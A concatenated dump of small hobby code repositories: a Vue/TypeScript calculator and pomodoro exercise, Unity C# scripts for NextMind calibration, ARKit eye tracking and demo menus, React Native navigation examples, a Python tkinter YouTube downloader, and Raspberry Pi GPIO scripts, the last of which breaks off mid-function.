 * Calculator key layout, row by row (top to bottom, left to right).
 * Each tuple is [button type, label, background color].
 */
const layout: [string, string, string][] = [
  // Row 1: clear key plus the first two operators.
  [buttonType[2], "AC", "#AC3939"],
  [buttonType[1], "/", "#666"],
  [buttonType[1], "*", "#666"],
  // Row 2.
  [buttonType[0], "7", "#4D4D4D"],
  [buttonType[0], "8", "#4D4D4D"],
  [buttonType[0], "9", "#4D4D4D"],
  [buttonType[1], "-", "#666"],
  // Row 3.
  [buttonType[0], "4", "#4D4D4D"],
  [buttonType[0], "5", "#4D4D4D"],
  [buttonType[0], "6", "#4D4D4D"],
  [buttonType[1], "+", "#666"],
  // Row 4.
  [buttonType[0], "1", "#4D4D4D"],
  [buttonType[0], "2", "#4D4D4D"],
  [buttonType[0], "3", "#4D4D4D"],
  [buttonType[3], "=", "#004466"],
  // Row 5.
  [buttonType[0], "0", "#4D4D4D"],
  [buttonType[0], ".", "#4D4D4D"],
];
for (const [kind, label, color] of layout) {
  buttonList.push(new CalculatorButton(kind, label, color));
}
export { buttonList };
<file_sep>import axios from "axios";
// Axios instance bound to the quote API.
const requestQuote = axios.create({
baseURL: "https://v1.alapi.cn/api",
timeout: 2000,
});
// Fetch a famous quote of the given category id.
// Resolves with the API's `data` payload on a 2xx status, with `false` on an
// unexpected status, and with `undefined` when the request itself fails
// (the error is only logged, never rethrown).
export function getQuote(typeid) {
return requestQuote({
url: "/mingyan",
params: {
typeid,
},
})
.then((result) => {
if (result.status > 199 && result.status < 300) {
return result.data.data;
} else {
console.log("request error");
return false;
}
})
.catch((error) => console.log(error));
}
<file_sep>export class Exercise {
// title: display name of the exercise; src: path to its demo page;
// cTime: creation timestamp, defaulting to performance.now() at construction.
constructor(
readonly title: string,
readonly src: string,
readonly cTime: number = performance.now()
) {}
}
<file_sep>export enum clockState {
// Countdown lifecycle: created -> running -> stopped (paused) -> end.
isReady,
running,
stopped,
end,
}
export enum clockType {
// Pomodoro phases: a work Session or a Break between sessions.
Session,
Break,
}
/**
 * A pause-able countdown for one pomodoro phase.
 *
 * Time is measured by accumulating real elapsed wall-clock time between
 * self-rescheduling zero-delay timeouts, so pausing and resuming never
 * drifts the remaining time.
 */
export class ClockItem {
  /** Phase name, one of the `clockType` member names. */
  readonly type: string;
  /** Milliseconds counted so far (may be mutated by resume/reset logic). */
  pastTime: number;
  /** Total length of this phase in milliseconds. */
  readonly totalTime: number;
  protected timer: null | number = null;
  /** Wall-clock timestamp of the last tick, used to measure elapsed time. */
  protected intervalMs: number = 0;
  /** Current lifecycle state, one of the `clockState` member names. */
  state: string = clockState[0];
  constructor(minute: number, type: number = 0) {
    this.type = clockType[type];
    this.totalTime = minute * 60 * 1000;
    this.pastTime = 0;
  }
  /**
   * Milliseconds left. Clamped at 0 so that a final tick overshooting
   * `totalTime` can never yield a negative remainder (which previously made
   * `clockValue` render a negative minute).
   */
  get remainingTime() {
    return Math.max(0, this.totalTime - this.pastTime);
  }
  /** Remaining time formatted as zero-padded "MM:SS". */
  get clockValue() {
    const totalSeconds = Math.floor(this.remainingTime / 1000);
    const minute = String(Math.floor(totalSeconds / 60)).padStart(2, "0");
    const second = String(totalSeconds % 60).padStart(2, "0");
    return minute + ":" + second;
  }
  /** Begin (or resume) counting down. No-op when already running. */
  start() {
    if (this.state === clockState[1]) {
      // Guard against stacking a second timeout chain on double-start.
      return;
    }
    this.state = clockState[1];
    this.run();
  }
  protected run() {
    this.intervalMs = Date.now(); // reference point for this tick
    this.timer = setTimeout(() => {
      // Add however much real time passed since the last tick.
      this.pastTime += Date.now() - this.intervalMs;
      if (this.pastTime < this.totalTime) {
        this.run(); // keep ticking
      } else {
        this.timer = null;
        this.state = clockState[3];
      }
    });
  }
  /** Stop counting; `start()` resumes from the accumulated `pastTime`. */
  pause() {
    this.state = clockState[2];
    if (this.timer !== null) {
      clearTimeout(this.timer);
      this.timer = null;
    }
  }
}
<file_sep>export enum buttonType {
// Calculator key kinds: digits/dot, operators, clear, and "=".
valueButton,
signButton,
ACButton,
computedButton,
}
export class CalculatorButton {
  /**
   * Immutable description of a single calculator key.
   * @param type  Entry of `buttonType` naming the key's behaviour.
   * @param value Label / token emitted when the key is pressed.
   * @param color Background color used when rendering the key.
   */
  constructor(
    public readonly type: string,
    public readonly value: string,
    public readonly color: string
  ) {}
}
<file_sep>const path = require("path");
// Vue CLI config: build into docs/ with relative asset paths (GitHub Pages)
// and expose src/network under the "network" import alias.
module.exports = {
publicPath: "",
outputDir: "docs",
chainWebpack: (config) => {
config.resolve.alias.set("network", path.resolve(__dirname, "src/network"));
},
};
| c47430ee5933aeb63a301bd425e887218d2312db | [
"JavaScript",
"TypeScript"
] | 10 | TypeScript | YJL626/vueExercise | 39adc88354c00b536b52e450703c6bd0312ce0b3 | 2ff5b1f3fef71af78343665539639cba72bdca0e |
refs/heads/main | <repo_name>atx-barnes/ixd-prototyping-tool<file_sep>/Assets/Scripts/GameManager.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using System;
using NextMind.Calibration;
using NextMind.Devices;
using NextMind.NeuroTags;
using NextMind;
using TMPro;
// Drives the NextMind demo: runs headset calibration, tracks the on-ground
// reticle under the mouse, and pushes the ball toward the reticle when the
// NeuroTag is focused (or AddForce is invoked directly).
public class GameManager : MonoBehaviour {
[SerializeField]
private CalibrationManager CalibrationManager;
[SerializeField]
private GameObject Reticle;
[SerializeField]
private GameObject NeuroTagObject;
[SerializeField]
private GameObject Ball;
// Scales the impulse applied to the ball per focus event.
[SerializeField]
private float ForceMultiplier = 50;
// Captured at startup so the tag can be restored after calibration shrinks it.
private Vector3 InitialNeuroTagScale;
// Gates all force input until calibration results arrive.
private bool CalibrationIsDone = false;
private void Awake() {
InitialNeuroTagScale = NeuroTagObject.transform.localScale;
Cursor.visible = false;
}
private void Start() {
StartCoroutine(StartCalibrationWhenReady());
}
// Keeps the reticle glued to whatever rigidbody surface the mouse ray hits,
// slightly above y=0 to avoid z-fighting with the ground plane.
void Update() {
RaycastHit hitReticle;
var rayReticle = Camera.main.ScreenPointToRay(Input.mousePosition);
if (Physics.Raycast(rayReticle, out hitReticle)) {
if (hitReticle.rigidbody != null) {
Reticle.transform.position = new Vector3(hitReticle.point.x, 0.01f, hitReticle.point.z);
}
}
}
private IEnumerator StartCalibrationWhenReady() {
// Waiting for the NeuroManager to be ready
yield return new WaitUntil(NeuroManager.Instance.IsReady);
// Actually start the calibration process.
CalibrationManager.StartCalibration();
// Listen to the incoming results
CalibrationManager.onCalibrationResultsAvailable.AddListener(OnReceivedResults);
}
// Calibration results callback with device and user grade information
private void OnReceivedResults(Device device, CalibrationResults.CalibrationGrade grade) {
Debug.Log($"Received results for {device.Name} with a grade of {grade}");
CalibrationIsDone = true;
ResetNeuroTag();
}
// Pushes the ball toward the point the mouse ray hits on the "ground"
// surface. Does nothing until calibration has completed.
public void AddForce() {
if (CalibrationIsDone) {
RaycastHit hit;
var ray = Camera.main.ScreenPointToRay(Input.mousePosition);
if (Physics.Raycast(ray, out hit)) {
if (hit.rigidbody != null && hit.transform.tag == "ground") {
Vector3 dir = (hit.point - Ball.transform.position).normalized;
Ball.GetComponent<Rigidbody>().AddForceAtPosition(dir * ForceMultiplier, hit.point);
}
}
}
}
// Hooked up to the NeuroTag's focus event in the inspector.
public void OnFocusForce() {
AddForce();
}
// Restores the NeuroTag's original scale and re-hides the cursor.
public void ResetNeuroTag() {
NeuroTagObject.transform.localScale = InitialNeuroTagScale;
Cursor.visible = false;
}
}
<file_sep>/Assets/Scripts/EyeTracker.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.XR.ARFoundation;
using UnityEngine.XR.ARSubsystems;
[RequireComponent(typeof(ARFace))]
// Tracks ARKit face/eye data and maps the gaze fixation point onto the
// screen-space reticle owned by the InteractionManager.
public class EyeTracker : MonoBehaviour
{
    // Latest gaze fixation point, in screen coordinates.
    public Vector3 eyeGazePosition;
    // True while the face is actively tracked and the AR session is running.
    public bool arEyeTrackingState;

    [SerializeField]
    private GameObject eyePrefab;

    private GameObject eyeLeft;
    private GameObject eyeRight;
    private ARFace arFace;
    private InteractionManager interactionManager;

    // Offsets applied to the raw gaze point so a centre-screen fixation maps
    // the reticle to the centre (set by CalibrateReticleFixationPoint).
    private float calibrationOffsetX = 0;
    private float calibrationOffsetY = 0;

    void Awake() {
        arFace = this.GetComponent<ARFace>();
    }

    private void OnEnable() {
        ARFaceManager arFaceManager = FindObjectOfType<ARFaceManager>();
        interactionManager = FindObjectOfType<InteractionManager>();
        if (interactionManager != null) {
            interactionManager.CalibrateButton.onClick.AddListener(CalibrateReticleFixationPoint);
            interactionManager.eyeTracker = this;
        }
        //TODO: Fix this
        if (arFaceManager != null /* && arFaceManager.subsystem != null && arFaceManager.subsystem.SubsystemDescriptor.supportsEyeTracking*/) {
            arFace.updated += OnUpdated;
        }
        else {
            Debug.LogWarningFormat("Eye tracking not support on device");
        }
    }

    private void OnDisable() {
        arFace.updated -= OnUpdated;
        // Bug fix: OnEnable only subscribes when an InteractionManager was
        // found, so mirror that guard here instead of dereferencing a
        // potentially null reference.
        if (interactionManager != null) {
            interactionManager.CalibrateButton.onClick.RemoveListener(CalibrateReticleFixationPoint);
        }
        SetVisibility(false);
    }

    /// <summary>
    /// Callback detects any changes that are made to the AR Face data.
    /// </summary>
    /// <param name="eventArgs"></param>
    void OnUpdated(ARFaceUpdatedEventArgs eventArgs) {
        // Lazily instantiate one marker prefab per eye the first time ARKit
        // reports that eye's transform.
        if (arFace.leftEye != null && eyeLeft == null) {
            eyeLeft = Instantiate(eyePrefab, arFace.leftEye);
            eyeLeft.SetActive(false);
        }
        if (arFace.rightEye != null && eyeRight == null) {
            eyeRight = Instantiate(eyePrefab, arFace.rightEye);
            eyeRight.SetActive(false);
        }
        arEyeTrackingState = (arFace.trackingState == TrackingState.Tracking) && (ARSession.state > ARSessionState.Ready);
        UpdateScreenReticle();
        SetVisibility(arEyeTrackingState);
    }

    /// <summary>
    /// Sets visibility of each eye prefab so they dont show up in the scene after being instantiated.
    /// </summary>
    /// <param name="isVisible"></param>
    private void SetVisibility(bool isVisible) {
        if (eyeLeft != null && eyeRight != null) {
            eyeLeft.SetActive(isVisible);
            eyeRight.SetActive(isVisible);
        }
    }

    /// <summary>
    /// Updates the position of the reticle in screen space from the fixation point in world space.
    /// </summary>
    private void UpdateScreenReticle() {
        var fixationInViewSpace = Camera.main.WorldToViewportPoint(arFace.fixationPoint.position);
        // The camera texture is mirrored so x and y must be changed to match where the fixation point is in relation to the face.
        var mirrorFixationInView = new Vector3(1 - fixationInViewSpace.x, 1 - fixationInViewSpace.y, fixationInViewSpace.z);
        // Bug fix: also check interactionManager itself, which is null when no
        // InteractionManager was found during OnEnable.
        if (interactionManager != null && interactionManager.ScreenReticle != null) {
            eyeGazePosition = Camera.main.ViewportToScreenPoint(mirrorFixationInView);
            interactionManager.ScreenReticle.anchoredPosition3D = new Vector3((eyeGazePosition.x + calibrationOffsetX) * interactionManager.GazeMovementSlider.value, (eyeGazePosition.y + calibrationOffsetY) * interactionManager.GazeMovementSlider.value, eyeGazePosition.z);
        }
    }

    /// <summary>
    /// Calibrates the reticle position relitive to the center of the screen.
    /// </summary>
    public void CalibrateReticleFixationPoint() {
        calibrationOffsetX = -eyeGazePosition.x;
        calibrationOffsetY = -eyeGazePosition.y;
    }
}<file_sep>/Assets/Scripts/DemoMenuManager.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine.SceneManagement;
using UnityEngine;
using UnityEngine.UI;
using UnityEngine.Events;
using TMPro;
using System;
// Serializable so designers can author demo entries directly in the inspector.
[Serializable]
public class Demo {
// Display name shown in the menu.
public string Name;
public string Description;
// Name of the Unity scene loaded when this demo starts.
public string SceneName;
public Sprite IconImage;
// Menu button that selects this demo.
public Button DemoMenuButton;
// Ordered tutorial step texts shown before the demo launches.
public List<string> TutorialSteps;
}
// Menu flow: pick a demo -> show its info -> show its tutorial -> load its
// scene. Button listeners are (re)wired per selection.
public class DemoMenuManager : MonoBehaviour {
    public TextMeshProUGUI NameTMP;
    public TextMeshProUGUI DescriptionTMP;
    public TutorialCardManager TutorialCardManager;
    public Button StartDemoSceneButton;
    public Button ContinueButton;
    public Image Icon;
    public List<Demo> Demo = new List<Demo>();

    private void OnEnable() {
        foreach (Demo demo in Demo) {
            demo.DemoMenuButton.onClick.AddListener(() => LoadDemoInformation(demo));
        }
    }

    // Shows the selected demo's name, description and icon, and wires the
    // continue button to that demo's tutorial.
    public void LoadDemoInformation(Demo demo) {
        Debug.Log("Loading Demo Information...");
        NameTMP.text = demo.Name;
        DescriptionTMP.text = demo.Description;
        Icon.sprite = demo.IconImage;
        // Bug fix: clear any handler left over from a previously selected demo
        // so the continue button only advances the most recent selection
        // (listeners used to accumulate, one per menu click).
        ContinueButton.onClick.RemoveAllListeners();
        ContinueButton.onClick.AddListener(() => LoadTutorial(demo));
    }

    // Fills the tutorial cards for the demo and arms the start button.
    public void LoadTutorial(Demo demo) {
        Debug.Log("Loading Tutorial...");
        TutorialCardManager.InitializeTutiroialInformation(demo.TutorialSteps);
        ContinueButton.onClick.RemoveAllListeners();
        // Same accumulation guard for the start button.
        StartDemoSceneButton.onClick.RemoveAllListeners();
        StartDemoSceneButton.onClick.AddListener(() => LoadDemoExperience(demo));
    }

    // Loads the demo's scene and disarms the start button.
    public void LoadDemoExperience(Demo demo) {
        Debug.Log("Loading Scene...");
        SceneManager.LoadScene(demo.SceneName);
        StartDemoSceneButton.onClick.RemoveAllListeners();
    }

    private void OnDisable() {
        foreach (Demo demo in Demo) {
            demo.DemoMenuButton.onClick.RemoveAllListeners();
        }
        // Remove button listeners
        ContinueButton.onClick.RemoveAllListeners();
        StartDemoSceneButton.onClick.RemoveAllListeners();
    }
}
<file_sep>/Assets/Scripts/NeuroCalibration.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using System;
using NextMind.Calibration;
using NextMind.Devices;
using NextMind.NeuroTags;
using NextMind;
using TMPro;
// Runs NextMind calibration at startup and, once complete, forwards NeuroTag
// focus events to debug logging / animator triggers.
public class NeuroCalibration : MonoBehaviour
{
[SerializeField]
private CalibrationManager CalibrationManager;
[SerializeField]
private GameObject NeuroTag;
[SerializeField]
private Animator Animator;
// Captured at startup; restored once calibration finishes.
private Vector3 InitialNeuroTagSize;
// Gates the public callbacks until calibration results arrive.
private bool isCalibrationDone = false;
// Start is called before the first frame update
void Start()
{
Application.targetFrameRate = 90;
StartCoroutine(StartCalibrationWhenReady());
InitialNeuroTagSize = NeuroTag.transform.localScale;
}
private IEnumerator StartCalibrationWhenReady() {
// Waiting for the NeuroManager to be ready
yield return new WaitUntil(NeuroManager.Instance.IsReady);
// Actually start the calibration process.
CalibrationManager.StartCalibration();
Debug.Log("Starting Calibration");
// Listen to the incoming results
CalibrationManager.onCalibrationResultsAvailable.AddListener(OnReceivedResults);
}
// Calibration results callback with device and user grade information
private void OnReceivedResults(Device device, CalibrationResults.CalibrationGrade grade) {
Debug.Log($"Received results for {device.Name} with a grade of {grade}");
NeuroTag.transform.localScale = InitialNeuroTagSize;
isCalibrationDone = true;
}
// Logs the given text, but only after calibration has completed.
public void DebugNeuroTag(string text) {
if (isCalibrationDone) {
Debug.Log(text);
}
}
// Resets every trigger on the animator, then fires the requested one, so
// triggers from rapid focus changes never queue up.
public void SetAnimatorTrigger(string trigger) {
if(isCalibrationDone) {
foreach (AnimatorControllerParameter p in Animator.parameters) {
if (p.type == AnimatorControllerParameterType.Trigger) {
Animator.ResetTrigger(p.name);
}
}
Animator.SetTrigger(trigger);
}
}
}
<file_sep>/Assets/Scripts/TutorialCardManager.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using System;
using TMPro;
using UnityEngine.Events;
// Serializable wrapper holding one page worth of tutorial step texts.
[Serializable]
public class StepGroup {
public List<string> Steps = new List<string>();
}
// Pages a flat list of tutorial steps through a fixed set of text fields,
// with back/next navigation and per-page indicator dots.
public class TutorialCardManager : MonoBehaviour
{
public Color EnabledButtonColor;
public Color DisabledButtonColor;
public TextMeshProUGUI BackButton;
public TextMeshProUGUI NextButton;
// Parent whose children are the TMPro fields a page of steps is shown in;
// the child count defines the page size.
public GameObject StepsParent;
public GameObject PageIndicatorPrefab;
public Transform PageIndicatorsParent;
// Steps partitioned into pages of StepsTMP.Count entries.
private List<StepGroup> StepGroups = new List<StepGroup>();
private List<TextMeshProUGUI> StepsTMP = new List<TextMeshProUGUI>();
private List<GameObject> PageIndicators = new List<GameObject>();
// Index of the page currently shown.
private int index;
private void Awake() {
// NOTE(review): these two self-assignments look redundant — the fields are
// already TextMeshProUGUI references; confirm and simplify.
BackButton = BackButton.GetComponent<TextMeshProUGUI>();
NextButton = NextButton.GetComponent<TextMeshProUGUI>();
// Get references to TMPro text fields
foreach (Transform step in StepsParent.transform) {
StepsTMP.Add(step.GetComponent<TextMeshProUGUI>());
}
}
public void InitializeTutiroialInformation(List<string> steps) {
ResetTutorial();
// Create step groups based on the amount of text fields under the parent object in the hiearchy.
for (int i = 0, x = 0; i < steps.Count; i++) {
if (i % StepsTMP.Count == 0) {
StepGroup stepGroup = new StepGroup();
for (int z = 0; z < StepsTMP.Count; z++, x++) {
if (x < steps.Count) {
// Populate each step group with tutorial content
stepGroup.Steps.Add(steps[x]);
}
}
// Add group to list of step groups for initializing a list of step based on a index value
StepGroups.Add(stepGroup);
}
}
// Create page display indicators per group of steps
foreach (StepGroup group in StepGroups) {
PageIndicators.Add(Instantiate(PageIndicatorPrefab, PageIndicatorsParent));
}
// Inititlize first steps
InitializeGroupSteps(0);
}
// Populate the text fields with steps based on index number param
// (note: the parameter shadows the class-level `index` field).
private void InitializeGroupSteps(int index) {
// Clear out previous content
foreach (TextMeshProUGUI tmp in StepsTMP) {
if(!string.IsNullOrEmpty(tmp.text)) {
tmp.text = string.Empty;
}
}
// Populate text fields from each step group with the steps
for (int i = 0; i < StepGroups[index].Steps.Count; i++) {
StepsTMP[i].text = StepGroups[index].Steps[i];
}
// Turn off indicators
foreach (GameObject indicator in PageIndicators) {
indicator.transform.GetChild(1).gameObject.SetActive(false);
}
// Turn on indicator based on group
PageIndicators[index].transform.GetChild(1).gameObject.SetActive(true);
// Check if the the last steps are initialized
if (index == StepGroups.Count - 1) { NextButton.color = DisabledButtonColor; }
else { NextButton.color = EnabledButtonColor; }
// Check if the the first steps are initialized
if (index == 0) { BackButton.color = DisabledButtonColor; }
else { BackButton.color = EnabledButtonColor; }
}
// Cycle to the next group of steps
public void Next() {
if(index < StepGroups.Count - 1) {
index++;
InitializeGroupSteps(index);
}
}
// Cycle to the previous group of steps
public void Back() {
if(index > 0) {
index--;
InitializeGroupSteps(index);
}
}
// Reset the tutorial meta information
private void ResetTutorial() {
StepGroups.Clear();
PageIndicators.Clear();
index = 0;
// Clear page display indicators
foreach (Transform indicator in PageIndicatorsParent.transform) {
Destroy(indicator.gameObject);
}
}
}
<file_sep>/Assets/Scripts/InteractionManager.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.XR.ARFoundation;
using UnityEngine.UI;
using UnityEngine.XR.ARSubsystems;
using TMPro;
[RequireComponent(typeof(ARRaycastManager))]
// Bridges gaze input and AR: raycasts the screen reticle against detected
// planes each frame and keeps a world-space target at the hit point.
public class InteractionManager : MonoBehaviour
{
    public GameObject WorldTargetPrefab;

    [Header("UI Elements")]
    public Slider GazeMovementSlider;
    public Button CalibrateButton;
    public RectTransform ScreenReticle;

    private List<ARRaycastHit> arRaycastHits = new List<ARRaycastHit>();
    private Stack<GameObject> worldTargets = new Stack<GameObject>();
    private Image image;

    private EyeTracker m_EyeTracker;
    public EyeTracker eyeTracker {
        get => m_EyeTracker;
        set => m_EyeTracker = value;
    }

    [Header("AR Managers")]
    [SerializeField]
    private ARCameraManager m_CameraManager;
    public ARCameraManager cameraManager {
        get => m_CameraManager;
        set => m_CameraManager = value;
    }

    [SerializeField]
    private ARPlaneManager m_ARPlaneManager;
    public ARPlaneManager arPlaneManager {
        get => m_ARPlaneManager;
        set => m_ARPlaneManager = value;
    }

    [SerializeField]
    private ARRaycastManager m_ARRaycastManager;
    public ARRaycastManager arRaycastManager {
        get => m_ARRaycastManager;
        set => m_ARRaycastManager = value;
    }

    [SerializeField]
    ARSession m_Session;
    public ARSession session {
        get => m_Session;
        set => m_Session = value;
    }

    private void OnEnable() {
        if (m_CameraManager == null || m_Session == null)
            return;
        m_CameraManager.requestedFacingDirection = CameraFacingDirection.World;
        image = ScreenReticle.GetComponent<Image>();
    }

    private void Update() {
        if (arRaycastManager.Raycast(ScreenReticle.position, arRaycastHits, TrackableType.PlaneWithinPolygon)) {
            // A plane lies under the reticle: hide the 2D reticle and keep the
            // 3D world target at the hit pose instead.
            image.color = new Color(image.color.r, image.color.g, image.color.b, 0f);
            Pose hit = arRaycastHits[0].pose;
            if (worldTargets.Count == 0) {
                worldTargets.Push(Instantiate(WorldTargetPrefab, hit.position, Quaternion.identity));
            }
            else {
                worldTargets.Peek().transform.position = hit.position;
            }
            // Bug fix: return here. Previously execution fell through to the
            // line below, which immediately re-showed the reticle at 50%
            // alpha, so it was never actually hidden on a plane hit.
            return;
        }
        // No plane hit: show a translucent reticle for aiming feedback.
        image.color = new Color(image.color.r, image.color.g, image.color.b, 0.5f);
    }

    // Drops an additional world target (e.g. triggered by a UI/gaze action).
    public void PlaceTarget() {
        var target = Instantiate(WorldTargetPrefab);
        worldTargets.Push(target);
    }
}
| 8aa53d0e00ea45603b967691d0b8e59e17c65ae8 | [
"C#"
] | 6 | C# | atx-barnes/ixd-prototyping-tool | deffb0804b6afdf4ec187293bc8358724f4951b8 | 42da749106949444b5b6fe5cf0c9874c4b321519 |
def resolutionSelector(resolution, streams):
    """Return the first progressive MP4 stream description for *resolution*.

    Args:
        resolution: Desired vertical resolution as a bare string, e.g. "720".
        streams: Iterable of stream description strings (one per stream, as
            produced by stringifying pytube stream objects).

    Returns:
        The first entry containing both "video/mp4" and "res=<resolution>p",
        or None when no stream matches.

    Bug fixes vs. the original: the 720/480 branches contained only
    commented-out code and returned nothing, and the 360 branch indexed the
    list with its own elements (``streams[x]`` where ``x`` is a string),
    which raised TypeError. All resolutions now share the one working
    matching strategy from the 1080 branch, generalized to any resolution.
    """
    token = "res={}p".format(resolution)
    for stream in streams:
        if "video/mp4" in stream and token in stream:
            return stream
    return None
<file_sep>import tkinter as tk
from tkinter import *
from pytube import YouTube
from tkinter import messagebox, filedialog, ttk
from resolutionSelector import resolutionSelector
def widgets():
    """Build the downloader window's three rows of controls.

    Reads/writes the module-level widgets and Tk variables (root,
    video_Link, download_Path, resolutionBox, formatoBox) and wires the
    Browse/Download buttons to `browse` and `download`.
    """
    # Row 1: YouTube link entry and resolution picker.
    link_label = Label(root, text="YouTube link :", bg="#E8D579")
    link_label.grid(row=1, column=0, pady=5, padx=5)
    root.linkText = Entry(root, width=55, textvariable=video_Link)
    root.linkText.grid(row=1, column=1, pady=5, padx=5, columnspan=2)
    resolution_label = Label(root, text="Resolution :", bg="#E8D579")
    resolution_label.grid(row=1, column=3, pady=5, padx=5)
    root.comboResolution = ttk.Combobox(root, values=["1080", "720", "480", "360"], textvariable=resolutionBox)
    root.comboResolution.grid(row=1, column=4, pady=5, padx=5)
    # Row 2: destination folder picker and container format.
    destination_label = Label(root, text="Destination :", bg="#E8D579")
    destination_label.grid(row=2, column=0, pady=5, padx=5)
    root.destinationText = Entry(root, width=40, textvariable=download_Path)
    root.destinationText.grid(row=2, column=1, pady=5, padx=5)
    browse_b = Button(root, text="Browse", command=browse, width=10, bg="#05E8E0")
    browse_b.grid(row=2, column=2, pady=1, padx=1)
    combobox_label = Label(root, text="Formato :", bg="#E8D579")
    combobox_label.grid(row=2, column=3, pady=5, padx=5)
    root.comboFormato = ttk.Combobox(root, values=["Mp4", "Mp3"], textvariable=formatoBox)
    root.comboFormato.grid(row=2, column=4, pady=5, padx=5)
    # Row 3: download trigger.
    download_b = Button(root, text="Download", command=download, width=20, bg="#05E8E0")
    download_b.grid(row=3, column=1, pady=3, padx=3)
def browse():
    """Open a folder-picker dialog and store the choice in download_Path."""
    chosen_directory = filedialog.askdirectory(initialdir="YOUR DIRECTORY PATH")
    download_Path.set(chosen_directory)
def download():
    """Download the linked YouTube video into the chosen folder.

    Reads the URL, destination folder and resolution from the bound Tk
    variables, fetches the matching progressive stream and saves it.
    """
    youtube_link = video_Link.get()
    download_folder = download_Path.get()
    getvideo = YouTube(youtube_link)
    resolution = resolutionBox.get()
    # Fixed: the stream was hard-coded to "1080p" (ignoring the combobox
    # selection) and the actual download call was commented out, so the
    # success dialog appeared without anything being saved.
    videostream = getvideo.streams.get_by_resolution(resolution + "p")
    if videostream is None:
        messagebox.showerror("ERROR", "No stream available at " + resolution + "p")
        return
    videostream.download(download_folder)
    messagebox.showinfo("SUCCESSFULLY", " DOWNLOADED AND SAVED IN\n" + download_folder)
# --- Application bootstrap: fixed-size window and shared Tk variables ---
root = tk.Tk()
root.geometry("700x120")
root.resizable(False, False)
root.title("Downloader")
root.config(background="#000000")
# StringVars shared between the widgets and the callbacks above.
video_Link = StringVar()
download_Path = StringVar()
formatoBox = StringVar()
resolutionBox = StringVar()
widgets()
root.mainloop()
| b4a448d91ee261baabd5e2fa7b4c480a833c1417 | [
"Python"
] | 2 | Python | RodrigoRRR/Downloader | a3ff6dd61d35ad47d67e092389c0f56bca86838c | fbed1c86f98d82bef7e37b9301cb328225590567 |
refs/heads/main | <repo_name>whosmudassir/doremon<file_sep>/Navigations/DrawerNavigator.js
import React from 'react'
import { View, Text } from 'react-native'
import { NavigationContainer } from '@react-navigation/native'
import Home from './components/Home'
import About from './components/About'
import { createDrawerNavigator } from '@react-navigation/drawer';
const Drawer = createDrawerNavigator();
// Root component: wires the Home and About screens into a drawer
// navigator. "Home" is the initial route; the drawer is revealed by an
// edge swipe or by calling navigation.openDrawer() from a screen.
export default function App() {
  return (
    <NavigationContainer>
      <Drawer.Navigator initialRouteName="Home">
        <Drawer.Screen name="Home" component={Home} />
        <Drawer.Screen name="About" component={About} />
      </Drawer.Navigator>
    </NavigationContainer>
    // <View><Text>Hello world</Text></View>
  );
}
import React from 'react'
import { View, Text } from 'react-native'
import { NavigationContainer } from '@react-navigation/native'
import Home from './components/Home'
import About from './components/About'
import { createBottomTabNavigator } from '@react-navigation/bottom-tabs';
const Tab = createBottomTabNavigator();
// Root component: bottom-tab variant of the same two-screen app.
// Each Tab.Screen becomes one tab in the bottom bar; "Home" opens first.
export default function App() {
  return (
    <NavigationContainer>
      <Tab.Navigator initialRouteName="Home">
        <Tab.Screen name="Home" component={Home} />
        <Tab.Screen name="About" component={About} />
      </Tab.Navigator>
    </NavigationContainer>
    // <View><Text>Hello world</Text></View>
  );
}
import React from 'react'
import { View, Text } from 'react-native'
import { NavigationContainer } from '@react-navigation/native'
import Home from './components/Home'
import About from './components/About'
import { createNativeStackNavigator } from '@react-navigation/native-stack';
const Stack=createNativeStackNavigator()
// Root component: stack-navigator variant. screenOptions styles every
// screen's header; the About screen derives its title from the route
// params passed by the caller (see Home's navigation.navigate call).
export default function App() {
  return (
    <NavigationContainer>
      <Stack.Navigator screenOptions={{
        headerStyle: {
          backgroundColor: '#777'
        },
        headerTintColor: '#fff',
        headerTitleStyle: {
          fontWeight: 'bold',
        },
      }}>
        <Stack.Screen name="Home" component={Home} options={{title:'Home Screen from options'}} />
        <Stack.Screen name="About" component={About} options={({route})=>({title:route.params.name})}/>
      </Stack.Navigator>
    </NavigationContainer>
  )
}
<file_sep>/components/Home.js
import React from 'react'
import { View, Text, StyleSheet, Button } from 'react-native'
import { globalStyles } from '../globalStyles'
// Home screen: demonstrates navigating with route params ("About" reads
// route.params) and opening the drawer programmatically.
export default function Home({navigation}) {
    return (
        <View style={globalStyles.container}>
            <Text>Hello from Home</Text>
            <Button title="Go to about" onPress={()=>{navigation.navigate('About', {name:'Mudassir', age:23} )}}/>
            <Button title="Open drawer" onPress={() => navigation.openDrawer()} />
        </View>
    )
}
// Placeholder for screen-local styles; shared styles live in globalStyles.
const styles=StyleSheet.create({
})
| 0918002a6d290fd03ca29bd2749efed83703f56c | [
"JavaScript"
] | 4 | JavaScript | whosmudassir/doremon | 7051f0b263d54aa3c4b4ea97283e39931f3b92c4 | 3288b8981afd50e1a30abd0109445d3ef8149a2d |
refs/heads/master | <repo_name>roclas/raspberry-pi-utils<file_sep>/sensing_movement.py
#!/usr/bin/env python
# Poll a PIR motion sensor wired to BCM pin 7 and print an alert while
# movement is detected. Runs forever; stop with Ctrl-C.
import time
import RPi.GPIO as io
io.setmode(io.BCM)
pir_pin = 7
io.setup(pir_pin, io.IN) # activate input
# Sample the sensor twice per second; a high input means motion.
while True:
    if io.input(pir_pin):
        print("PIR ALARM!")
    time.sleep(0.5)
#!/usr/bin/env python
import time
import RPi.GPIO as GPIO
tiempo=1/1536.0
def main():
GPIO.cleanup()
GPIO.setmode(GPIO.BOARD)
# Set Pin 5 on the GPIO header to act as an output
GPIO.setup(5,GPIO.OUT)
# This loop runs forever and flashes the LED
while True:
GPIO.output(5,GPIO.HIGH)
print "se enciende el led"
# Wait for 2 seconds
time.sleep(tiempo)
GPIO.output(5,GPIO.LOW)
print "se apaga el led"
time.sleep(tiempo)
try:
main()
except:
print "error happened"
<file_sep>/intermitent.py
#!/usr/bin/env python
import time
import RPi.GPIO as GPIO
# Blink half-period in seconds, and the BOARD-numbered output pin.
tiempo=2.0
pin=11
def main():
    # Toggle the LED on `pin` forever, two seconds per state.
    GPIO.cleanup()
    GPIO.setmode(GPIO.BOARD)
    # Set Pin X on the GPIO header to act as an output
